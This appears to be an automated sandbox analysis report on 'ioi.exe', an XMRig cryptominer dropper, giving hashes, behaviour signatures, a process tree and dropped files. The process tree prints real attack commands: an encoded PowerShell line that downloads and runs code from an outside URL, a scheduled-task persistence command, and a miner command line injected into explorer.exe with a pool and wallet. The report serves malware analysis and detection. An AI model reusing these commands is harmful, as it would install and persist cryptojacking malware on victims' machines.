Analysis

  • max time kernel
    1786s
  • max time network
    1799s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/10/2023, 07:03

General

  • Target

    ioi.exe

  • Size

    2.1MB

  • MD5

    5e0016fdfe5a3fa39a24dcc2f96fed5c

  • SHA1

    9f7bc3d476e99906fa9f1b0a5e4f4049a62ed53f

  • SHA256

    e3e8c9ca96111a903d7a65b58e2e1c4e1a3b1be7b70f8e5aac1d1db10029532e

  • SHA512

    cf8e5d25b5e64d9540c754cdeba1f99699a48d04c4963c0e0c2af6e5a9c3d60ee0a07536e3edfea3257d0e900b152f04c2821e94a52a73c7da8fcc97aa2d3c85

  • SSDEEP

    49152:tQH0KnAbpxUR52CuztwNd3u9amjsCd2avSoMelNmR3kER1:aBAbpxURj4wNkwmjdiqNmp1

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://yip.su/UpdateSecurity

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 15 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\ioi.exe
    "C:\Users\Admin\AppData\Local\Temp\ioi.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4028
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\ioi.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4316
      • C:\Windows\System32\cmd.exe
        "cmd" /c powershell -encodedcommand WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAD0AWwBFAG4AdQBtAF0AOgA6AFQAbwBPAGIAagBlAGMAdAAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdACwAIAAzADAANwAyACkAOwAgAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHkAaQBwAC4AcwB1AC8AVQBwAGQAYQB0AGUAUwBlAGMAdQByAGkAdAB5ACcAKQA=
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3740
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -encodedcommand WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAD0AWwBFAG4AdQBtAF0AOgA6AFQAbwBPAGIAagBlAGMAdAAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdACwAIAAzADAANwAyACkAOwAgAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHkAaQBwAC4AcwB1AC8AVQBwAGQAYQB0AGUAUwBlAGMAdQByAGkAdAB5ACcAKQA=
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4224
      • C:\Windows\System32\cmd.exe
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2560
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
          4⤵
          • Creates scheduled task(s)
          PID:2780
      • C:\Windows\System32\cmd.exe
        "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3096
        • C:\Users\Admin\AppData\Roaming\services64.exe
          C:\Users\Admin\AppData\Roaming\services64.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4104
          • C:\Windows\System32\conhost.exe
            "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
            5⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4992
            • C:\Windows\System32\cmd.exe
              "cmd" /c powershell -encodedcommand WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAD0AWwBFAG4AdQBtAF0AOgA6AFQAbwBPAGIAagBlAGMAdAAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdACwAIAAzADAANwAyACkAOwAgAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHkAaQBwAC4AcwB1AC8AVQBwAGQAYQB0AGUAUwBlAGMAdQByAGkAdAB5ACcAKQA=
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1220
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -encodedcommand WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAD0AWwBFAG4AdQBtAF0AOgA6AFQAbwBPAGIAagBlAGMAdAAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdACwAIAAzADAANwAyACkAOwAgAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHkAaQBwAC4AcwB1AC8AVQBwAGQAYQB0AGUAUwBlAGMAdQByAGkAdAB5ACcAKQA=
                7⤵
                • Blocklisted process makes network request
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2792
            • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
              "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:4744
              • C:\Windows\System32\conhost.exe
                "C:\Windows\System32\conhost.exe" "/sihost64"
                7⤵
                  PID:4488
              • C:\Windows\explorer.exe
                C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=83YrRjXwc5aUdEmkKP1Kzmbkt6yKJno1mLc6bMxsKgswTGc8gKjVyuV2wfbwU7oT4Cb9JhnjMVDBe3Ht9V8151yoMXBAFB8 --pass=x --cpu-max-threads-hint=100
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2636

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

      Filesize

      539B

      MD5

      b245679121623b152bea5562c173ba11

      SHA1

      47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d

      SHA256

      73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f

      SHA512

      75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      2f57fde6b33e89a63cf0dfdd6e60a351

      SHA1

      445bf1b07223a04f8a159581a3d37d630273010f

      SHA256

      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

      SHA512

      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      b60ef292780d289f958e98523e2173a9

      SHA1

      60e54b94ca6f3489ff96b34c1abd04bc73466cef

      SHA256

      72ce6821405f0f3e75cefa67d8339abd06420adf5a372821c5c49c37e02955e6

      SHA512

      9816269c74e060a4b8494d93060d7111280e626ebaef93c6caa6c54da01aa71b9b545ebc16b3af2812a55c0021f0eceae73ef034f6eb4816bccfcc531a50d60f

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yovm3zot.l3s.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

      Filesize

      31KB

      MD5

      ba3b89f07c4964516d8ceec5159fd067

      SHA1

      ded85e1ead209a5aa44249eddd264db7642549a1

      SHA256

      13ea2f2f7d1426ccb3978b7080be2877e2066d654f59b6ad3dd693670dda7a8e

      SHA512

      3eb0ce49df208ba21b5663d7f1e4324d1a22575ab21a4ef0c5728192d28a0ab0c9adfc6367dda004db4458d17e6d9bba8b5dd6825489398fbbd3de6048b652c9

    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

      Filesize

      31KB

      MD5

      ba3b89f07c4964516d8ceec5159fd067

      SHA1

      ded85e1ead209a5aa44249eddd264db7642549a1

      SHA256

      13ea2f2f7d1426ccb3978b7080be2877e2066d654f59b6ad3dd693670dda7a8e

      SHA512

      3eb0ce49df208ba21b5663d7f1e4324d1a22575ab21a4ef0c5728192d28a0ab0c9adfc6367dda004db4458d17e6d9bba8b5dd6825489398fbbd3de6048b652c9

    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

      Filesize

      31KB

      MD5

      ba3b89f07c4964516d8ceec5159fd067

      SHA1

      ded85e1ead209a5aa44249eddd264db7642549a1

      SHA256

      13ea2f2f7d1426ccb3978b7080be2877e2066d654f59b6ad3dd693670dda7a8e

      SHA512

      3eb0ce49df208ba21b5663d7f1e4324d1a22575ab21a4ef0c5728192d28a0ab0c9adfc6367dda004db4458d17e6d9bba8b5dd6825489398fbbd3de6048b652c9

    • C:\Users\Admin\AppData\Roaming\services64.exe

      Filesize

      2.1MB

      MD5

      5e0016fdfe5a3fa39a24dcc2f96fed5c

      SHA1

      9f7bc3d476e99906fa9f1b0a5e4f4049a62ed53f

      SHA256

      e3e8c9ca96111a903d7a65b58e2e1c4e1a3b1be7b70f8e5aac1d1db10029532e

      SHA512

      cf8e5d25b5e64d9540c754cdeba1f99699a48d04c4963c0e0c2af6e5a9c3d60ee0a07536e3edfea3257d0e900b152f04c2821e94a52a73c7da8fcc97aa2d3c85

    • C:\Users\Admin\AppData\Roaming\services64.exe

      Filesize

      2.1MB

      MD5

      5e0016fdfe5a3fa39a24dcc2f96fed5c

      SHA1

      9f7bc3d476e99906fa9f1b0a5e4f4049a62ed53f

      SHA256

      e3e8c9ca96111a903d7a65b58e2e1c4e1a3b1be7b70f8e5aac1d1db10029532e

      SHA512

      cf8e5d25b5e64d9540c754cdeba1f99699a48d04c4963c0e0c2af6e5a9c3d60ee0a07536e3edfea3257d0e900b152f04c2821e94a52a73c7da8fcc97aa2d3c85

    • memory/2636-93-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2636-64-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2636-72-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2636-67-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2636-74-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2636-84-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2636-92-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2636-91-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2636-86-0x0000000014350000-0x0000000014390000-memory.dmp

      Filesize

      256KB

    • memory/2636-95-0x00000000146A0000-0x00000000146C0000-memory.dmp

      Filesize

      128KB

    • memory/2636-70-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2636-96-0x00000000146C0000-0x00000000146E0000-memory.dmp

      Filesize

      128KB

    • memory/2636-85-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2636-94-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2636-77-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2636-68-0x0000000002A00000-0x0000000002A20000-memory.dmp

      Filesize

      128KB

    • memory/2636-97-0x00000000146A0000-0x00000000146C0000-memory.dmp

      Filesize

      128KB

    • memory/2636-76-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2636-65-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2636-75-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2636-98-0x00000000146C0000-0x00000000146E0000-memory.dmp

      Filesize

      128KB

    • memory/2792-53-0x0000024410AF0000-0x0000024410B00000-memory.dmp

      Filesize

      64KB

    • memory/2792-57-0x0000024410AF0000-0x0000024410B00000-memory.dmp

      Filesize

      64KB

    • memory/2792-51-0x0000024410AF0000-0x0000024410B00000-memory.dmp

      Filesize

      64KB

    • memory/2792-50-0x00007FFD78530000-0x00007FFD78FF1000-memory.dmp

      Filesize

      10.8MB

    • memory/2792-73-0x00007FFD78530000-0x00007FFD78FF1000-memory.dmp

      Filesize

      10.8MB

    • memory/4224-8-0x000002BDCB240000-0x000002BDCB250000-memory.dmp

      Filesize

      64KB

    • memory/4224-6-0x00007FFD78530000-0x00007FFD78FF1000-memory.dmp

      Filesize

      10.8MB

    • memory/4224-18-0x000002BDCB210000-0x000002BDCB232000-memory.dmp

      Filesize

      136KB

    • memory/4224-23-0x00007FFD78530000-0x00007FFD78FF1000-memory.dmp

      Filesize

      10.8MB

    • memory/4224-7-0x000002BDCB240000-0x000002BDCB250000-memory.dmp

      Filesize

      64KB

    • memory/4224-22-0x000002BDE37B0000-0x000002BDE38B2000-memory.dmp

      Filesize

      1.0MB

    • memory/4224-19-0x000002BDCB240000-0x000002BDCB250000-memory.dmp

      Filesize

      64KB

    • memory/4316-26-0x0000021FF8820000-0x0000021FF8830000-memory.dmp

      Filesize

      64KB

    • memory/4316-30-0x00007FFD78530000-0x00007FFD78FF1000-memory.dmp

      Filesize

      10.8MB

    • memory/4316-1-0x0000021FF8A50000-0x0000021FF8C70000-memory.dmp

      Filesize

      2.1MB

    • memory/4316-2-0x0000021FF7C90000-0x0000021FF7CA2000-memory.dmp

      Filesize

      72KB

    • memory/4316-4-0x0000021FF8820000-0x0000021FF8830000-memory.dmp

      Filesize

      64KB

    • memory/4316-5-0x0000021FF8820000-0x0000021FF8830000-memory.dmp

      Filesize

      64KB

    • memory/4316-3-0x00007FFD78530000-0x00007FFD78FF1000-memory.dmp

      Filesize

      10.8MB

    • memory/4316-24-0x00007FFD78530000-0x00007FFD78FF1000-memory.dmp

      Filesize

      10.8MB

    • memory/4316-25-0x0000021FF8820000-0x0000021FF8830000-memory.dmp

      Filesize

      64KB

    • memory/4316-0-0x0000021FF5D20000-0x0000021FF5F41000-memory.dmp

      Filesize

      2.1MB

    • memory/4488-82-0x000002081BB30000-0x000002081BB40000-memory.dmp

      Filesize

      64KB

    • memory/4488-79-0x00007FFD78530000-0x00007FFD78FF1000-memory.dmp

      Filesize

      10.8MB

    • memory/4488-78-0x0000020801650000-0x0000020801656000-memory.dmp

      Filesize

      24KB

    • memory/4488-87-0x00007FFD78530000-0x00007FFD78FF1000-memory.dmp

      Filesize

      10.8MB

    • memory/4488-88-0x000002081BB30000-0x000002081BB40000-memory.dmp

      Filesize

      64KB

    • memory/4488-90-0x000002081BB30000-0x000002081BB40000-memory.dmp

      Filesize

      64KB

    • memory/4488-89-0x000002081BB30000-0x000002081BB40000-memory.dmp

      Filesize

      64KB

    • memory/4488-80-0x00000208019B0000-0x00000208019B6000-memory.dmp

      Filesize

      24KB

    • memory/4488-83-0x000002081BB30000-0x000002081BB40000-memory.dmp

      Filesize

      64KB

    • memory/4488-81-0x000002081BB30000-0x000002081BB40000-memory.dmp

      Filesize

      64KB

    • memory/4992-69-0x00007FFD78530000-0x00007FFD78FF1000-memory.dmp

      Filesize

      10.8MB

    • memory/4992-36-0x00007FFD78530000-0x00007FFD78FF1000-memory.dmp

      Filesize

      10.8MB

    • memory/4992-38-0x0000020764C20000-0x0000020764C30000-memory.dmp

      Filesize

      64KB

    • memory/4992-39-0x0000020764C20000-0x0000020764C30000-memory.dmp

      Filesize

      64KB

    • memory/4992-37-0x0000020764C20000-0x0000020764C30000-memory.dmp

      Filesize

      64KB